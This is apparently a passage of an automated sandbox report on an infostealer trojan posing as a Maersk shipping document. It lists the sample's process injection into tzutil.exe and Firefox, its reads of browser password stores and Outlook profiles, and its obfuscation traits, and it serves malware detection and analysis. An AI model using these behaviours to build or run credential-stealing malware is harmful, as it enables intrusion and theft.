                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E39B0 NtGetContextThread,3_2_017E39B0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E3D70 NtOpenThread,3_2_017E3D70
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E3D10 NtOpenProcessToken,3_2_017E3D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03474340 NtSetContextThread,LdrInitializeThunk,6_2_03474340
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03474650 NtSuspendThread,LdrInitializeThunk,6_2_03474650
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034735C0 NtCreateMutant,LdrInitializeThunk,6_2_034735C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472B60 NtClose,LdrInitializeThunk,6_2_03472B60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03472BE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03472BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03472BA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472AD0 NtReadFile,LdrInitializeThunk,6_2_03472AD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472AF0 NtWriteFile,LdrInitializeThunk,6_2_03472AF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034739B0 NtGetContextThread,LdrInitializeThunk,6_2_034739B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472F30 NtCreateSection,LdrInitializeThunk,6_2_03472F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472FE0 NtCreateFile,LdrInitializeThunk,6_2_03472FE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472FB0 NtResumeThread,LdrInitializeThunk,6_2_03472FB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03472EE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03472E80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03472D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03472D30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472DD0 NtDelayExecution,LdrInitializeThunk,6_2_03472DD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03472DF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472C60 NtCreateKey,LdrInitializeThunk,6_2_03472C60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03472C70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03472CA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03473010 NtOpenDirectoryObject,6_2_03473010
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03473090 NtSetValueKey,6_2_03473090
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472B80 NtQueryInformationFile,6_2_03472B80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472AB0 NtWaitForSingleObject,6_2_03472AB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472F60 NtCreateProcessEx,6_2_03472F60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472F90 NtProtectVirtualMemory,6_2_03472F90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472FA0 NtQuerySection,6_2_03472FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472E30 NtWriteVirtualMemory,6_2_03472E30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472EA0 NtAdjustPrivilegesToken,6_2_03472EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03473D70 NtOpenThread,6_2_03473D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472D00 NtSetInformationFile,6_2_03472D00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03473D10 NtOpenProcessToken,6_2_03473D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472DB0 NtEnumerateKey,6_2_03472DB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472C00 NtQueryInformationProcess,6_2_03472C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472CC0 NtQueryVirtualMemory,6_2_03472CC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03472CF0 NtOpenProcess,6_2_03472CF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_00989480 NtCreateFile,6_2_00989480
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_009895F0 NtReadFile,6_2_009895F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_009896E0 NtDeleteFile,6_2_009896E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_00989780 NtClose,6_2_00989780
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_009898E0 NtAllocateVirtualMemory,6_2_009898E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0096B3E06_2_0096B3E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_009757F06_2_009757F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_009739FB6_2_009739FB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_00973A006_2_00973A00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0098BD506_2_0098BD50
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0330E5446_2_0330E544
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0330E4266_2_0330E426
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0330D9A86_2_0330D9A8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0330E8DC6_2_0330E8DC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0330CC486_2_0330CC48
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: String function: 0179B970 appears 280 times
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: String function: 017E5130 appears 58 times
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: String function: 0182F290 appears 105 times
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: String function: 017F7E54 appears 111 times
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: String function: 0181EA12 appears 86 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 034AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0342B970 appears 268 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 03475130 appears 36 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 03487E54 appears 96 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 034BF290 appears 105 times
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1335365759.000000000158E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1351593345.0000000009930000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1345641584.00000000043F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1350820628.0000000007C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000000.1295160397.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaqoo.exeJ vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1345641584.0000000004439000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1345641584.0000000004439000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1888335259.000000000189D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001257000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exeBinary or memory string: OriginalFilenameaqoo.exeJ vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, jMa7fjAUpnw3QeHttd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, jMa7fjAUpnw3QeHttd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@6/3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAERSK LINE SHIPPING DOC_4253.exe.log
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMutant created: NULL
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\SysWOW64\tzutil.exeFile created: C:\Users\user\AppData\Local\Temp\UQ63g7r-
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: tzutil.exe, 00000006.00000002.2537188170.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2083262010.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2537188170.0000000003206000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2537188170.00000000031E3000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2537188170.00000000031B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: MAERSK LINE SHIPPING DOC_4253.exeReversingLabs: Detection: 26%
                Source: unknownProcess created: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe"
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess created: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe"
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: mscoree.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: dwrite.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: textshaping.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: amsi.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: userenv.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: tzutil.pdbGCTL source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001237000.00000004.00000020.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000003.1847284658.00000000006CB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FeNbdhmZHKN.exe, 00000005.00000002.2536087512.000000000002E000.00000002.00000001.01000000.0000000D.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962093607.000000000002E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1895310973.0000000003256000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1886785367.0000000002F63000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MAERSK LINE SHIPPING DOC_4253.exe, MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000006.00000003.1895310973.0000000003256000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1886785367.0000000002F63000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: aqoo.pdbSHA256 source: MAERSK LINE SHIPPING DOC_4253.exe
                Source: Binary string: tzutil.pdb source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001237000.00000004.00000020.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000003.1847284658.00000000006CB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: aqoo.pdb source: MAERSK LINE SHIPPING DOC_4253.exe

                Data Obfuscation

                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, uwJUeTqjPGwpbVfh4n.cs.Net Code: gu4S7GI46G System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, uwJUeTqjPGwpbVfh4n.cs.Net Code: gu4S7GI46G System.Reflection.Assembly.Load(byte[])
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: 0xA3168CF8 [Thu Sep 14 13:34:48 2056 UTC]
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_07C49939 push A7D807C5h; ret 0_2_07C49946
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_084A7211 push FFFFFFFDh; ret 0_2_084A7225
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_004031D0 push eax; ret 3_2_004031D2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_004169E7 push 0F6CFD2Bh; ret 3_2_00416A18
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00423A0A push esp; ret 3_2_00423A0D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00419359 push ds; ret 3_2_0041935B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00418366 pushad ; iretd 3_2_00418367
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00408325 push dword ptr [ebx+5Dh]; ret 3_2_0040830B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00417388 push edi; ret 3_2_0041738D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00419477 push edx; ret 3_2_00419485
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00408403 push 00000074h; iretd 3_2_0040840B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00417411 push eax; ret 3_2_00417414
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00411D6F push ds; iretd 3_2_00411DBD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00411D7B push ds; iretd 3_2_00411DBD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0041758A push ebp; ret 3_2_004175A6
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0040D66A push ecx; iretd 3_2_0040D6D9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00414E05 push cs; retf 3_2_00414E14
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0040860D push cs; retf 3_2_0040860E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00413E93 pushfd ; ret 3_2_00413F00
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00413EBC pushfd ; ret 3_2_00413F00
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0177225F pushad ; ret 3_2_017727F9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017727FA pushad ; ret 3_2_017727F9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A09AD push ecx; mov dword ptr [esp], ecx3_2_017A09B6
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0177283D push eax; iretd 3_2_01772858
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_0250AA95 push ds; iretd 5_2_0250AAD7
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_0250AA89 push ds; iretd 5_2_0250AAD7
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_025102A4 push ebp; ret 5_2_025102C0
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_0250DB1F push cs; retf 5_2_0250DB2E
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_02501327 push cs; retf 5_2_02501328
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_0250CBD6 pushfd ; ret 5_2_0250CC1A
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_02506384 push ecx; iretd 5_2_025063F3
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: section name: .text entropy: 7.6234510150876185
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, vRZWAsohNfhPZndlcA.csHigh entropy of concatenated method names: 'R86YAfmxil', 'MouY6rAqRY', 'BH1YwBHoW1', 'FVGY5fHCko', 'lPTY1tW1Oq', 'IShYUbGQfW', 'FUmYu0uDtk', 'OCvYNE5NY0', 'yySYMrsypo', 'KlHYWZ8Mi4'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, wabeSddRDnYfb5JXpy.csHigh entropy of concatenated method names: 'zMx8K3XGbl', 'MNs8HNJuyY', 'z7K8kyBNjx', 'NTp8F40h1t', 'MMG8OMwmdB', 'Ws78q1GZRU', 'Next', 'Next', 'Next', 'NextBytes'
